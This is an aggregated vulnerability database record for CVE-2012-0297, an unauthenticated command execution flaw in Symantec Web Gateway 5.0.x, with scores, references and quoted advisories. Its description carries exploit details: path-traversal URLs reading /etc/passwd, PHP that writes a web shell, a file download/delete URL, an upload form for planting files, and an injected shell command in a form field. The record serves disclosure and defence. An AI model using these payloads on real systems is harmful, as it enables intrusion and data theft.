ID

VAR-201205-0220


CVE

CVE-2012-0297


TITLE

Symantec Web Gateway Remote Shell Command Execution Vulnerability

Trust: 0.9

sources: CNVD: CNVD-2012-2638 // BID: 53444

DESCRIPTION

The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in '/spywall/ipchange.php' and 'network.php'. There is also a flaw in '/spywall/download_file.php' that allows unauthenticated users to download and delete any file on the server. Symantec Web Gateway is a Web security gateway hardware appliance. Due to weak validation and lack of filtering of user control input, an attacker can inject arbitrary code into an application script and execute it with application privileges. Successful exploits will result in the execution of arbitrary attack-supplied commands in the context of the affected application. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. Software: Symantec Web Gateway Current Software Version: 5.0.2.8 Product homepage: www.symantec.com Author: S2 Crew [Hungary] CVE: CVE-2012-0297, CVE-2012-0298, ??? File include: https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd File include and OS command execution: http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd You can execute OS commands just include the error_log: /usr/local/apache2/logs/ -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log Make a connection to port 80: <?php $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w'); $cmd = "<?php system(\$_GET['cmd']); ?>"; fputs($f,$cmd); fclose($f); print "Shell creation done<br>"; ?> Arbitary file download and delete: https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog d parameter: the complete filename After the download process application removes the original file with root access! :) Command execution methods: 1.Method Download and delete the /var/www/html/ciu/.htaccess file. After it you can access the ciu interface on web. There is an upload script: /ciu/uploadFile.php User can control the filename and the upload location: $_FILES['uploadFile']; $_POST['uploadLocation']; 2.Method <form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data"> <input type="file" name="uploadFile"> <input type="text" name="action" value="upload"> <input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/"> <input type="hidden" name="configuration" value="test"> <input type="submit" value="upload!"> </form> The "/var/www/html/spywall/cleaner" is writeable by www-data. Command execution after authentication: http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove) From the modified POST message: Content-Disposition: form-data; name="pingaddress" 127.0.0.1`whoami>/tmp/1234.txt` . - -- Vendor Response: Symantec has issued an update to correct this vulnerability. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT9JkrlVtgMGTo1scAQK0Bwf+Ns64PZhwAAyfloBVx8Pb/6DTVjd8g1yp Xi5ynP006/9fLSnI2UACJdFJqUj0MPM6YUuOgpsGfncxVYVAc96pawv3pxfsfwfm kkAo2aUPIsx4xQP3Mtz3YNpWb8jl/L1SUiNLu4ogKhuA1y82gXIRot4wNq9s0DWr 11d8pTUgHJtPnlH43bWAvzqnnsf0OapaePuHEfOArEZK5kUBangirZSOyYiH+zfG Axl29pM2pLEC2ZNtJ/rbEaQhrG1chwt9+QIiQWRb5Z0V7FssO1M6AduMF7D71LoF HxgfwMBHPTlGJoWYb3LovAfDrlbeJm5sQGIabUha4TNUnAuInSURBQ== =fH5n -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Symantec Web Gateway Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49216 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49216/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 RELEASE DATE: 2012-05-18 DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49216/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system. 1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available. 2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. 3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files. 4) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are reported in versions prior to 5.0.3. SOLUTION: Update to version 5.0.3. PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure. 4) The vendor credits Ajay Pal Singh Atwal and an anonymous person. ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Trust: 3.42

sources: NVD: CVE-2012-0297 // JVNDB: JVNDB-2012-002472 // ZDI: ZDI-12-090 // CNVD: CNVD-2012-2638 // BID: 53444 // VULHUB: VHN-53578 // PACKETSTORM: 114231 // PACKETSTORM: 113446 // PACKETSTORM: 112876

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2012-2638

AFFECTED PRODUCTS

vendor:symantecmodel:web gatewayscope:eqversion:5.0

Trust: 2.5

vendor:symantecmodel:web gatewayscope:eqversion:5.0.1

Trust: 2.5

vendor:symantecmodel:web gatewayscope:eqversion:5.0.2

Trust: 1.6

vendor:symantecmodel:web gatewayscope:eqversion:5.0.3

Trust: 0.8

vendor:symantecmodel:web gatewayscope:ltversion:5.0.x

Trust: 0.8

vendor:symantecmodel:web gatewayscope: - version: -

Trust: 0.7

vendor:symantecmodel:web gatewayscope:neversion:5.0.3

Trust: 0.3

sources: ZDI: ZDI-12-090 // CNVD: CNVD-2012-2638 // BID: 53444 // JVNDB: JVNDB-2012-002472 // CNNVD: CNNVD-201205-332 // NVD: CVE-2012-0297

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2012-0297
value: HIGH

Trust: 1.0

NVD: CVE-2012-0297
value: HIGH

Trust: 0.8

ZDI: CVE-2012-0297
value: HIGH

Trust: 0.7

CNNVD: CNNVD-201205-332
value: CRITICAL

Trust: 0.6

VULHUB: VHN-53578
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2012-0297
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

ZDI: CVE-2012-0297
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.7

VULHUB: VHN-53578
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: ZDI: ZDI-12-090 // VULHUB: VHN-53578 // JVNDB: JVNDB-2012-002472 // CNNVD: CNNVD-201205-332 // NVD: CVE-2012-0297

PROBLEMTYPE DATA

problemtype:CWE-264

Trust: 1.9

sources: VULHUB: VHN-53578 // JVNDB: JVNDB-2012-002472 // NVD: CVE-2012-0297

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 113446 // CNNVD: CNNVD-201205-332

TYPE

permissions and access control

Trust: 0.6

sources: CNNVD: CNNVD-201205-332

CONFIGURATIONS

sources: JVNDB: JVNDB-2012-002472

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-53578

PATCH

title:SYM12-006url:http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00

Trust: 1.5

title:SYM12-006url:http://www.symantec.com/ja/jp/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00

Trust: 0.8

title:Patch for Symantec Web Gateway remote shell command execution vulnerabilityurl:https://www.cnvd.org.cn/patchInfo/show/17131

Trust: 0.6

sources: ZDI: ZDI-12-090 // CNVD: CNVD-2012-2638 // JVNDB: JVNDB-2012-002472

EXTERNAL IDS

db:NVDid:CVE-2012-0297

Trust: 4.3

db:BIDid:53444

Trust: 2.0

db:ZDIid:ZDI-12-090

Trust: 0.8

db:JVNDBid:JVNDB-2012-002472

Trust: 0.8

db:ZDI_CANid:ZDI-CAN-1435

Trust: 0.7

db:CNNVDid:CNNVD-201205-332

Trust: 0.7

db:SECUNIAid:49216

Trust: 0.7

db:CNVDid:CNVD-2012-2638

Trust: 0.6

db:NSFOCUSid:19664

Trust: 0.6

db:PACKETSTORMid:114231

Trust: 0.2

db:PACKETSTORMid:113446

Trust: 0.2

db:PACKETSTORMid:113090

Trust: 0.1

db:PACKETSTORMid:113485

Trust: 0.1

db:PACKETSTORMid:113050

Trust: 0.1

db:SEEBUGid:SSVID-73035

Trust: 0.1

db:SEEBUGid:SSVID-72928

Trust: 0.1

db:SEEBUGid:SSVID-72934

Trust: 0.1

db:SEEBUGid:SSVID-73332

Trust: 0.1

db:EXPLOIT-DBid:18942

Trust: 0.1

db:EXPLOIT-DBid:19065

Trust: 0.1

db:EXPLOIT-DBid:18932

Trust: 0.1

db:EXPLOIT-DBid:19406

Trust: 0.1

db:VULHUBid:VHN-53578

Trust: 0.1

db:PACKETSTORMid:112876

Trust: 0.1

sources: ZDI: ZDI-12-090 // CNVD: CNVD-2012-2638 // VULHUB: VHN-53578 // BID: 53444 // JVNDB: JVNDB-2012-002472 // PACKETSTORM: 114231 // PACKETSTORM: 113446 // PACKETSTORM: 112876 // CNNVD: CNNVD-201205-332 // NVD: CVE-2012-0297

REFERENCES

url:http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00

Trust: 2.7

url:http://www.securityfocus.com/bid/53444

Trust: 1.7

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/75731

Trust: 1.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0297

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0297

Trust: 0.8

url:http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory

Trust: 0.6

url:http://secunia.com/advisories/49216

Trust: 0.6

url:http://www.nsfocus.net/vulndb/19664

Trust: 0.6

url:http://www.symantec.com/business/web-gateway

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2012-0297

Trust: 0.2

url:http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&amp;pvid=security_advisory&amp;year=2012&amp;suid=20120517_00

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2012-0298

Trust: 0.1

url:https://192.168.82.207/spywall/previewproxyerror.php?err=../../../../../../../../etc/passwd

Trust: 0.1

url:http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd

Trust: 0.1

url:https://www.symantec.com

Trust: 0.1

url:http://192.168.82.207/spywall/adminconfig.php

Trust: 0.1

url:https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog

Trust: 0.1

url:https://192.168.82.192/ciu/remoterepairs.php"

Trust: 0.1

url:http://www.zerodayinitiative.com/advisories/disclosure_policy/

Trust: 0.1

url:http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se

Trust: 0.1

url:http://twitter.com/thezdi

Trust: 0.1

url:http://www.zerodayinitiative.com

Trust: 0.1

url:http://www.zerodayinitiative.com/advisories/zdi-12-090

Trust: 0.1

url:http://secunia.com/advisories/49216/

Trust: 0.1

url:https://ca.secunia.com/?page=viewadvisory&vuln_id=49216

Trust: 0.1

url:http://secunia.com/advisories/49216/#comments

Trust: 0.1

url:http://secunia.com/psi_30_beta_launch

Trust: 0.1

url:http://secunia.com/vulnerability_intelligence/

Trust: 0.1

url:http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

Trust: 0.1

url:http://secunia.com/advisories/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/vulnerability_scanning/personal/

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/advisories/about_secunia_advisories/

Trust: 0.1

sources: ZDI: ZDI-12-090 // CNVD: CNVD-2012-2638 // VULHUB: VHN-53578 // BID: 53444 // JVNDB: JVNDB-2012-002472 // PACKETSTORM: 114231 // PACKETSTORM: 113446 // PACKETSTORM: 112876 // CNNVD: CNNVD-201205-332 // NVD: CVE-2012-0297

CREDITS

An anonymous contributor working with Beyond Security's SecuriTeam Secure Disclosure project

Trust: 0.9

sources: BID: 53444 // CNNVD: CNNVD-201205-332

SOURCES

db:ZDIid:ZDI-12-090
db:CNVDid:CNVD-2012-2638
db:VULHUBid:VHN-53578
db:BIDid:53444
db:JVNDBid:JVNDB-2012-002472
db:PACKETSTORMid:114231
db:PACKETSTORMid:113446
db:PACKETSTORMid:112876
db:CNNVDid:CNNVD-201205-332
db:NVDid:CVE-2012-0297

LAST UPDATE DATE

2025-04-11T22:53:43.640000+00:00


SOURCES UPDATE DATE

db:ZDIid:ZDI-12-090date:2012-06-08T00:00:00
db:CNVDid:CNVD-2012-2638date:2012-05-21T00:00:00
db:VULHUBid:VHN-53578date:2017-12-05T00:00:00
db:BIDid:53444date:2012-06-28T12:10:00
db:JVNDBid:JVNDB-2012-002472date:2012-05-23T00:00:00
db:CNNVDid:CNNVD-201205-332date:2012-05-21T00:00:00
db:NVDid:CVE-2012-0297date:2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db:ZDIid:ZDI-12-090date:2012-06-08T00:00:00
db:CNVDid:CNVD-2012-2638date:2012-05-21T00:00:00
db:VULHUBid:VHN-53578date:2012-05-21T00:00:00
db:BIDid:53444date:2012-05-17T00:00:00
db:JVNDBid:JVNDB-2012-002472date:2012-05-23T00:00:00
db:PACKETSTORMid:114231date:2012-06-27T14:25:28
db:PACKETSTORMid:113446date:2012-06-09T02:28:10
db:PACKETSTORMid:112876date:2012-05-18T05:24:51
db:CNNVDid:CNNVD-201205-332date:2012-05-21T00:00:00
db:NVDid:CVE-2012-0297date:2012-05-21T20:55:17.727